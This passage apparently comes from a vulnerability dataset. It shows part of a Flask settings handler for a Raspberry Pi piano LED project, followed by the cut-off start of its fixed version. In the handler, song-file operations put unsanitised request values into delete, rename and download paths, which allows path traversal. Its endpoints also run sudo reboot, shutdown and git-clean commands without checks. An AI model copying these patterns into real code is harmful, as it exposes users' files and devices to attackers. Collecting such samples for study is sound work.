webinterface.ledsettings.speed_fastest[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"speed_fastest_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"speed_fastest_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"speed_fastest_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"gradient_start_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.gradient_start[\"red\"] = rgb[0]\n webinterface.ledsettings.gradient_start[\"green\"] = rgb[1]\n webinterface.ledsettings.gradient_start[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"gradient_start_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"gradient_start_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"gradient_start_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"gradient_end_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.gradient_end[\"red\"] = rgb[0]\n webinterface.ledsettings.gradient_end[\"green\"] = rgb[1]\n webinterface.ledsettings.gradient_end[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"gradient_end_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"gradient_end_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"gradient_end_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"speed_max_notes\":\n webinterface.ledsettings.speed_max_notes = int(value)\n webinterface.usersettings.change_setting_value(\"speed_max_notes\", int(value))\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"speed_period_in_seconds\":\n webinterface.ledsettings.speed_period_in_seconds = float(value)\n webinterface.usersettings.change_setting_value(\"speed_period_in_seconds\", float(value))\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"key_in_scale_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.key_in_scale[\"red\"] = rgb[0]\n webinterface.ledsettings.key_in_scale[\"green\"] = rgb[1]\n webinterface.ledsettings.key_in_scale[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"key_in_scale_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"key_in_scale_green\", rgb[1])\n 
webinterface.usersettings.change_setting_value(\"key_in_scale_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"key_not_in_scale_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.key_not_in_scale[\"red\"] = rgb[0]\n webinterface.ledsettings.key_not_in_scale[\"green\"] = rgb[1]\n webinterface.ledsettings.key_not_in_scale[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"key_not_in_scale_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"key_not_in_scale_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"key_not_in_scale_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"scale_key\":\n webinterface.ledsettings.scale_key = int(value)\n webinterface.usersettings.change_setting_value(\"scale_key\", int(value))\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"next_step\":\n webinterface.ledsettings.set_sequence(0, 1, False)\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"set_sequence\":\n if (int(value) == 0):\n webinterface.ledsettings.__init__(webinterface.usersettings)\n webinterface.ledsettings.sequence_active = False\n else:\n webinterface.ledsettings.set_sequence(int(value) - 1, 0)\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"change_sequence_name\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n sequence_to_edit = \"sequence_\" + str(value)\n\n sequences_tree.getElementsByTagName(sequence_to_edit)[\n 0].getElementsByTagName(\"settings\")[\n 0].getElementsByTagName(\"sequence_name\")[0].firstChild.nodeValue = str(second_value)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"change_step_value\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n sequence_to_edit = \"sequence_\" + str(value)\n\n sequences_tree.getElementsByTagName(sequence_to_edit)[\n 0].getElementsByTagName(\"settings\")[\n 0].getElementsByTagName(\"next_step\")[0].firstChild.nodeValue = str(second_value)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"change_step_activation_method\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n sequence_to_edit = \"sequence_\" + str(value)\n\n sequences_tree.getElementsByTagName(sequence_to_edit)[\n 0].getElementsByTagName(\"settings\")[\n 0].getElementsByTagName(\"control_number\")[0].firstChild.nodeValue = str(second_value)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"add_sequence\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n sequences_amount = 1\n while True:\n if (len(sequences_tree.getElementsByTagName(\"sequence_\" + str(sequences_amount))) == 0):\n break\n sequences_amount += 1\n\n settings = sequences_tree.createElement(\"settings\")\n\n control_number = sequences_tree.createElement(\"control_number\")\n control_number.appendChild(sequences_tree.createTextNode(\"0\"))\n settings.appendChild(control_number)\n\n next_step = sequences_tree.createElement(\"next_step\")\n next_step.appendChild(sequences_tree.createTextNode(\"1\"))\n settings.appendChild(next_step)\n\n sequence_name = sequences_tree.createElement(\"sequence_name\")\n 
sequence_name.appendChild(sequences_tree.createTextNode(\"Sequence \" + str(sequences_amount)))\n settings.appendChild(sequence_name)\n\n step = sequences_tree.createElement(\"step_1\")\n\n color = sequences_tree.createElement(\"color\")\n color.appendChild(sequences_tree.createTextNode(\"RGB\"))\n step.appendChild(color)\n\n red = sequences_tree.createElement(\"Red\")\n red.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(red)\n\n green = sequences_tree.createElement(\"Green\")\n green.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(green)\n\n blue = sequences_tree.createElement(\"Blue\")\n blue.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(blue)\n\n light_mode = sequences_tree.createElement(\"light_mode\")\n light_mode.appendChild(sequences_tree.createTextNode(\"Normal\"))\n step.appendChild(light_mode)\n\n element = sequences_tree.createElement(\"sequence_\" + str(sequences_amount))\n element.appendChild(settings)\n element.appendChild(step)\n\n sequences_tree.getElementsByTagName(\"list\")[0].appendChild(element)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"remove_sequence\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n # removing sequence node\n nodes = sequences_tree.getElementsByTagName(\"sequence_\" + str(value))\n for node in nodes:\n parent = node.parentNode\n parent.removeChild(node)\n\n # changing nodes tag names\n i = 1\n for sequence in sequences_tree.getElementsByTagName(\"list\")[0].childNodes:\n if (sequence.nodeType == 1):\n sequences_tree.getElementsByTagName(sequence.nodeName)[0].tagName = \"sequence_\" + str(i)\n i += 1\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"add_step\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n step_amount = 1\n while True:\n if (len(sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].getElementsByTagName(\n \"step_\" + str(step_amount))) == 0):\n break\n step_amount += 1\n\n step = sequences_tree.createElement(\"step_\" + str(step_amount))\n\n color = sequences_tree.createElement(\"color\")\n\n color.appendChild(sequences_tree.createTextNode(\"RGB\"))\n step.appendChild(color)\n\n red = sequences_tree.createElement(\"Red\")\n red.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(red)\n\n green = sequences_tree.createElement(\"Green\")\n green.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(green)\n\n blue = sequences_tree.createElement(\"Blue\")\n blue.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(blue)\n\n light_mode = sequences_tree.createElement(\"light_mode\")\n light_mode.appendChild(sequences_tree.createTextNode(\"Normal\"))\n step.appendChild(light_mode)\n\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].appendChild(step)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence, reload_steps_list=True)\n\n # remove node list with a tag name \"step_\" + str(value), and change tag names to maintain order\n if setting_name == \"remove_step\":\n\n second_value = int(second_value)\n second_value += 1\n\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n # removing step node\n nodes = sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].getElementsByTagName(\n \"step_\" + 
str(second_value))\n for node in nodes:\n parent = node.parentNode\n parent.removeChild(node)\n\n # changing nodes tag names\n i = 1\n for step in sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].childNodes:\n if (step.nodeType == 1 and step.tagName != \"settings\"):\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].getElementsByTagName(step.nodeName)[\n 0].tagName = \"step_\" + str(i)\n i += 1\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n # saving current led settings as sequence step\n if setting_name == \"save_led_settings_to_step\" and second_value != \"\":\n\n # remove node and child under \"sequence_\" + str(value) and \"step_\" + str(second_value)\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n second_value = int(second_value)\n second_value += 1\n\n nodes = sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].getElementsByTagName(\n \"step_\" + str(second_value))\n for node in nodes:\n parent = node.parentNode\n parent.removeChild(node)\n\n # create new step node\n step = sequences_tree.createElement(\"step_\" + str(second_value))\n\n # load color mode from webinterface.ledsettings and put it into step node\n color_mode = sequences_tree.createElement(\"color\")\n color_mode.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.color_mode)))\n step.appendChild(color_mode)\n\n # load mode from webinterface.ledsettings and put it into step node\n mode = sequences_tree.createElement(\"light_mode\")\n mode.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.mode)))\n step.appendChild(mode)\n\n # if mode is equal \"Fading\" or \"Velocity\" load mode from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.mode == \"Fading\" or webinterface.ledsettings.mode == \"Velocity\"):\n fadingspeed = sequences_tree.createElement(\"fadingspeed\")\n\n # depending on fadingspeed name set different fadingspeed value\n if (webinterface.ledsettings.fadingspeed == \"Slow\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"10\"))\n elif (webinterface.ledsettings.fadingspeed == \"Medium\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"20\"))\n elif (webinterface.ledsettings.fadingspeed == \"Fast\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"40\"))\n elif (webinterface.ledsettings.fadingspeed == \"Very fast\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"50\"))\n elif (webinterface.ledsettings.fadingspeed == \"Instant\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"1000\"))\n elif (webinterface.ledsettings.fadingspeed == \"Very slow\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"2\"))\n\n step.appendChild(fadingspeed)\n\n # if color_mode is equal to \"Single\" load color from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Single\"):\n red = sequences_tree.createElement(\"Red\")\n red.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.red)))\n step.appendChild(red)\n\n green = sequences_tree.createElement(\"Green\")\n green.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.green)))\n step.appendChild(green)\n\n blue = sequences_tree.createElement(\"Blue\")\n blue.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.blue)))\n step.appendChild(blue)\n\n # if color_mode is equal to \"Multicolor\" load colors from 
webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Multicolor\"):\n # load value from webinterface.ledsettings.multicolor\n multicolor = webinterface.ledsettings.multicolor\n\n # loop through multicolor object and add each color to step node under \"sequence_\"+str(value) with tag name \"color_\"+str(i)\n for i in range(len(multicolor)):\n color = sequences_tree.createElement(\"color_\" + str(i + 1))\n new_multicolor = str(multicolor[i])\n new_multicolor = new_multicolor.replace(\"[\", \"\")\n new_multicolor = new_multicolor.replace(\"]\", \"\")\n\n color.appendChild(sequences_tree.createTextNode(new_multicolor))\n step.appendChild(color)\n\n # same as above but with multicolor_range and \"color_range_\"+str(i)\n multicolor_range = webinterface.ledsettings.multicolor_range\n for i in range(len(multicolor_range)):\n color_range = sequences_tree.createElement(\"color_range_\" + str(i + 1))\n new_multicolor_range = str(multicolor_range[i])\n\n new_multicolor_range = new_multicolor_range.replace(\"[\", \"\")\n new_multicolor_range = new_multicolor_range.replace(\"]\", \"\")\n color_range.appendChild(sequences_tree.createTextNode(new_multicolor_range))\n step.appendChild(color_range)\n\n # if color_mode is equal to \"Rainbow\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Rainbow\"):\n # load values rainbow_offset, rainbow_scale and rainbow_timeshift from webinterface.ledsettings and put them into step node under Offset, Scale and Timeshift\n rainbow_offset = sequences_tree.createElement(\"Offset\")\n rainbow_offset.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.rainbow_offset)))\n step.appendChild(rainbow_offset)\n\n rainbow_scale = sequences_tree.createElement(\"Scale\")\n rainbow_scale.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.rainbow_scale)))\n step.appendChild(rainbow_scale)\n\n rainbow_timeshift = sequences_tree.createElement(\"Timeshift\")\n rainbow_timeshift.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.rainbow_timeshift)))\n step.appendChild(rainbow_timeshift)\n\n # if color_mode is equal to \"Speed\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Speed\"):\n # load values speed_slowest[\"red\"] etc from webinterface.ledsettings and put them under speed_slowest_red etc\n speed_slowest_red = sequences_tree.createElement(\"speed_slowest_red\")\n speed_slowest_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_slowest[\"red\"])))\n step.appendChild(speed_slowest_red)\n\n speed_slowest_green = sequences_tree.createElement(\"speed_slowest_green\")\n speed_slowest_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_slowest[\"green\"])))\n step.appendChild(speed_slowest_green)\n\n speed_slowest_blue = sequences_tree.createElement(\"speed_slowest_blue\")\n speed_slowest_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_slowest[\"blue\"])))\n step.appendChild(speed_slowest_blue)\n\n # same as above but with \"fastest\"\n speed_fastest_red = sequences_tree.createElement(\"speed_fastest_red\")\n speed_fastest_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_fastest[\"red\"])))\n step.appendChild(speed_fastest_red)\n\n speed_fastest_green = sequences_tree.createElement(\"speed_fastest_green\")\n 
speed_fastest_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_fastest[\"green\"])))\n step.appendChild(speed_fastest_green)\n\n speed_fastest_blue = sequences_tree.createElement(\"speed_fastest_blue\")\n speed_fastest_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_fastest[\"blue\"])))\n step.appendChild(speed_fastest_blue)\n\n # load \"speed_max_notes\" and \"speed_period_in_seconds\" values from webinterface.ledsettings\n # and put them under speed_max_notes and speed_period_in_seconds\n\n speed_max_notes = sequences_tree.createElement(\"speed_max_notes\")\n speed_max_notes.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.speed_max_notes)))\n step.appendChild(speed_max_notes)\n\n speed_period_in_seconds = sequences_tree.createElement(\"speed_period_in_seconds\")\n speed_period_in_seconds.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_period_in_seconds)))\n step.appendChild(speed_period_in_seconds)\n\n # if color_mode is equal to \"Gradient\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Gradient\"):\n # load values gradient_start_red etc from webinterface.ledsettings and put them under gradient_start_red etc\n gradient_start_red = sequences_tree.createElement(\"gradient_start_red\")\n gradient_start_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_start[\"red\"])))\n step.appendChild(gradient_start_red)\n\n gradient_start_green = sequences_tree.createElement(\"gradient_start_green\")\n gradient_start_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_start[\"green\"])))\n step.appendChild(gradient_start_green)\n\n gradient_start_blue = sequences_tree.createElement(\"gradient_start_blue\")\n gradient_start_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_start[\"blue\"])))\n step.appendChild(gradient_start_blue)\n\n # same as above but with gradient_end\n gradient_end_red = sequences_tree.createElement(\"gradient_end_red\")\n gradient_end_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_end[\"red\"])))\n step.appendChild(gradient_end_red)\n\n gradient_end_green = sequences_tree.createElement(\"gradient_end_green\")\n gradient_end_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_end[\"green\"])))\n step.appendChild(gradient_end_green)\n\n gradient_end_blue = sequences_tree.createElement(\"gradient_end_blue\")\n gradient_end_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_end[\"blue\"])))\n step.appendChild(gradient_end_blue)\n\n # if color_mode is equal to \"Scale\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Scale\"):\n # load values key_in_scale_red etc from webinterface.ledsettings and put them under key_in_scale_red etc\n key_in_scale_red = sequences_tree.createElement(\"key_in_scale_red\")\n key_in_scale_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_in_scale[\"red\"])))\n step.appendChild(key_in_scale_red)\n\n key_in_scale_green = sequences_tree.createElement(\"key_in_scale_green\")\n key_in_scale_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_in_scale[\"green\"])))\n step.appendChild(key_in_scale_green)\n\n 
key_in_scale_blue = sequences_tree.createElement(\"key_in_scale_blue\")\n key_in_scale_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_in_scale[\"blue\"])))\n step.appendChild(key_in_scale_blue)\n\n # same as above but with key_not_in_scale\n key_not_in_scale_red = sequences_tree.createElement(\"key_not_in_scale_red\")\n key_not_in_scale_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_not_in_scale[\"red\"])))\n step.appendChild(key_not_in_scale_red)\n\n key_not_in_scale_green = sequences_tree.createElement(\"key_not_in_scale_green\")\n key_not_in_scale_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_not_in_scale[\"green\"])))\n step.appendChild(key_not_in_scale_green)\n\n key_not_in_scale_blue = sequences_tree.createElement(\"key_not_in_scale_blue\")\n key_not_in_scale_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_not_in_scale[\"blue\"])))\n step.appendChild(key_not_in_scale_blue)\n\n try:\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[\n 0].insertBefore(step,\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[\n 0].getElementsByTagName(\"step_\" + str(second_value + 1))[0])\n except:\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].appendChild(step)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence, reload_steps_list=True)\n\n if setting_name == \"screen_on\":\n if (int(value) == 0):\n webinterface.menu.disable_screen()\n else:\n webinterface.menu.enable_screen()\n\n if setting_name == \"reset_to_default\":\n webinterface.usersettings.reset_to_default()\n\n if setting_name == \"restart_rpi\":\n call(\"sudo /sbin/reboot now\", shell=True)\n\n if setting_name == \"turnoff_rpi\":\n call(\"sudo /sbin/shutdown -h now\", shell=True)\n\n if setting_name == \"update_rpi\":\n call(\"sudo git reset --hard HEAD\", shell=True)\n call(\"sudo git checkout .\", shell=True)\n call(\"sudo git clean -fdx\", shell=True)\n call(\"sudo git pull origin master\", shell=True)\n\n if setting_name == \"connect_ports\":\n webinterface.midiports.connectall()\n return jsonify(success=True, reload_ports=True)\n\n if setting_name == \"disconnect_ports\":\n call(\"sudo aconnect -x\", shell=True)\n return jsonify(success=True, reload_ports=True)\n\n if setting_name == \"restart_rtp\":\n call(\"sudo systemctl restart rtpmidid\", shell=True)\n\n if setting_name == \"start_recording\":\n webinterface.saving.start_recording()\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"cancel_recording\":\n webinterface.saving.cancel_recording()\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"save_recording\":\n now = datetime.datetime.now()\n current_date = now.strftime(\"%Y-%m-%d %H:%M\")\n webinterface.saving.save(current_date)\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"change_song_name\":\n if os.path.exists(\"Songs/\" + second_value):\n return jsonify(success=False, reload_songs=True, error=second_value + \" already exists\")\n\n if \"_main\" in value:\n search_name = value.replace(\"_main.mid\", \"\")\n for fname in os.listdir('Songs'):\n if search_name in fname:\n new_name = second_value.replace(\".mid\", \"\") + fname.replace(search_name, \"\")\n os.rename('Songs/' + fname, 'Songs/' + new_name)\n else:\n os.rename('Songs/' + value, 'Songs/' + second_value)\n os.rename('Songs/cache/' + 
value + \".p\", 'Songs/cache/' + second_value + \".p\")\n\n\n\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"remove_song\":\n if \"_main\" in value:\n name_no_suffix = value.replace(\"_main.mid\", \"\")\n for fname in os.listdir('Songs'):\n if name_no_suffix in fname:\n os.remove(\"Songs/\" + fname)\n else:\n os.remove(\"Songs/\" + value)\n\n file_types = [\".musicxml\", \".xml\", \".mxl\", \".abc\"]\n for file_type in file_types:\n try:\n os.remove(\"Songs/\" + value.replace(\".mid\", file_type))\n except:\n pass\n\n try:\n os.remove(\"Songs/cache/\" + value + \".p\")\n except:\n print(\"No cache file for \" + value)\n\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"download_song\":\n if \"_main\" in value:\n zipObj = ZipFile(\"Songs/\" + value.replace(\".mid\", \"\") + \".zip\", 'w')\n name_no_suffix = value.replace(\"_main.mid\", \"\")\n songs_count = 0\n for fname in os.listdir('Songs'):\n if name_no_suffix in fname and \".zip\" not in fname:\n songs_count += 1\n zipObj.write(\"Songs/\" + fname)\n zipObj.close()\n if songs_count == 1:\n os.remove(\"Songs/\" + value.replace(\".mid\", \"\") + \".zip\")\n return send_file(\"../Songs/\" + value, mimetype='application/x-csv', attachment_filename=value,\n as_attachment=True)\n else:\n return send_file(\"../Songs/\" + value.replace(\".mid\", \"\") + \".zip\", mimetype='application/x-csv',\n attachment_filename=value.replace(\".mid\", \"\") + \".zip\", as_attachment=True)\n else:\n return send_file(\"../Songs/\" + value, mimetype='application/x-csv', attachment_filename=value,\n as_attachment=True)\n\n if setting_name == \"download_sheet_music\":\n file_types = [\".musicxml\", \".xml\", \".mxl\", \".abc\"]\n i = 0\n while i < len(file_types):\n try:\n new_name = value.replace(\".mid\", file_types[i])\n return send_file(\"../Songs/\" + new_name, mimetype='application/x-csv', attachment_filename=new_name,\n as_attachment=True)\n except:\n i += 1\n webinterface.learning.convert_midi_to_abc(value)\n try:\n return send_file(\"../Songs/\" + value.replace(\".mid\", \".abc\"), mimetype='application/x-csv',\n attachment_filename=value.replace(\".mid\", \".abc\"), as_attachment=True)\n except:\n print(\"Converting failed\")\n\n\n if setting_name == \"start_midi_play\":\n webinterface.saving.t = threading.Thread(target=play_midi, args=(value, webinterface.midiports,\n webinterface.saving, webinterface.menu,\n webinterface.ledsettings,\n webinterface.ledstrip))\n webinterface.saving.t.start()\n\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"stop_midi_play\":\n webinterface.saving.is_playing_midi.clear()\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"learning_load_song\":\n webinterface.learning.t = threading.Thread(target=webinterface.learning.load_midi, args=(value,))\n webinterface.learning.t.start()\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"start_learning_song\":\n webinterface.learning.t = threading.Thread(target=webinterface.learning.learn_midi)\n webinterface.learning.t.start()\n\n return jsonify(success=True)\n\n if setting_name == \"stop_learning_song\":\n webinterface.learning.is_started_midi = False\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n return jsonify(success=True)\n\n if setting_name == \"change_practice\":\n value = int(value)\n webinterface.learning.practice = value\n 
webinterface.learning.practice = clamp(webinterface.learning.practice, 0, len(webinterface.learning.practiceList) - 1)\n webinterface.usersettings.change_setting_value(\"practice\", webinterface.learning.practice)\n\n return jsonify(success=True)\n\n if setting_name == \"change_tempo\":\n value = int(value)\n webinterface.learning.set_tempo = value\n webinterface.learning.set_tempo = clamp(webinterface.learning.set_tempo, 10, 200)\n webinterface.usersettings.change_setting_value(\"set_tempo\", webinterface.learning.set_tempo)\n\n return jsonify(success=True)\n\n if setting_name == \"change_hands\":\n value = int(value)\n webinterface.learning.hands = value\n webinterface.learning.hands = clamp(webinterface.learning.hands, 0, len(webinterface.learning.handsList) - 1)\n webinterface.usersettings.change_setting_value(\"hands\", webinterface.learning.hands)\n\n return jsonify(success=True)\n\n if setting_name == \"change_mute_hand\":\n value = int(value)\n webinterface.learning.mute_hand = value\n webinterface.learning.mute_hand = clamp(webinterface.learning.mute_hand, 0, len(webinterface.learning.mute_handList) - 1)\n webinterface.usersettings.change_setting_value(\"mute_hand\", webinterface.learning.mute_hand)\n\n return jsonify(success=True)\n\n if setting_name == \"learning_start_point\":\n value = int(value)\n webinterface.learning.start_point = value\n webinterface.learning.start_point = clamp(webinterface.learning.start_point, 0, webinterface.learning.end_point - 1)\n webinterface.usersettings.change_setting_value(\"start_point\", webinterface.learning.start_point)\n webinterface.learning.restart_learning()\n\n return jsonify(success=True)\n\n if setting_name == \"learning_end_point\":\n value = int(value)\n webinterface.learning.end_point = value\n webinterface.learning.end_point = clamp(webinterface.learning.end_point, webinterface.learning.start_point + 1, 100)\n webinterface.usersettings.change_setting_value(\"end_point\", webinterface.learning.end_point)\n webinterface.learning.restart_learning()\n\n return jsonify(success=True)\n\n if setting_name == \"set_current_time_as_start_point\":\n webinterface.learning.start_point = round(float(webinterface.learning.current_idx * 100 / float(len(webinterface.learning.song_tracks))), 3)\n webinterface.learning.start_point = clamp(webinterface.learning.start_point, 0, webinterface.learning.end_point - 1)\n webinterface.usersettings.change_setting_value(\"start_point\", webinterface.learning.start_point)\n webinterface.learning.restart_learning()\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"set_current_time_as_end_point\":\n webinterface.learning.end_point = round(float(webinterface.learning.current_idx * 100 / float(len(webinterface.learning.song_tracks))), 3)\n webinterface.learning.end_point = clamp(webinterface.learning.end_point, webinterface.learning.start_point + 1, 100)\n webinterface.usersettings.change_setting_value(\"end_point\", webinterface.learning.end_point)\n webinterface.learning.restart_learning()\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"change_handL_color\":\n value = int(value)\n webinterface.learning.hand_colorL += value\n webinterface.learning.hand_colorL = clamp(webinterface.learning.hand_colorL, 0, len(webinterface.learning.hand_colorList) - 1)\n webinterface.usersettings.change_setting_value(\"hand_colorL\", webinterface.learning.hand_colorL)\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == 
\"change_handR_color\":\n value = int(value)\n webinterface.learning.hand_colorR += value\n webinterface.learning.hand_colorR = clamp(webinterface.learning.hand_colorR, 0, len(webinterface.learning.hand_colorList) - 1)\n webinterface.usersettings.change_setting_value(\"hand_colorR\", webinterface.learning.hand_colorR)\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"change_learning_loop\":\n value = int(value == 'true')\n webinterface.learning.is_loop_active = value\n webinterface.usersettings.change_setting_value(\"is_loop_active\", webinterface.learning.is_loop_active)\n\n return jsonify(success=True)\n\n\n return jsonify(success=True)"}], "fix_func": [{"id": "fix_py_105_1", "commit": "3f10602", "file_path": "webinterface/views_api.py", "start_line": "146", "end_line": "1115", "snippet": "def change_setting():\n setting_name = request.args.get('setting_name')\n value = request.args.get('value')\n second_value = request.args.get('second_value')\n disable_sequence = request.args.get('disable_sequence')\n\n reload_sequence = True\n if (second_value == \"no_reload\"):\n reload_sequence = False\n\n if (disable_sequence == \"true\"):\n webinterface.ledsettings.__init__(webinterface.usersettings)\n webinterface.ledsettings.sequence_active = False\n\n if setting_name == \"clean_ledstrip\":\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n if setting_name == \"led_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n\n webinterface.ledsettings.color_mode = \"Single\"\n\n webinterface.ledsettings.red = rgb[0]\n webinterface.ledsettings.green = rgb[1]\n webinterface.ledsettings.blue = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"color_mode\", webinterface.ledsettings.color_mode)\n webinterface.usersettings.change_setting_value(\"red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"light_mode\":\n webinterface.ledsettings.mode = value\n webinterface.usersettings.change_setting_value(\"mode\", value)\n\n if setting_name == 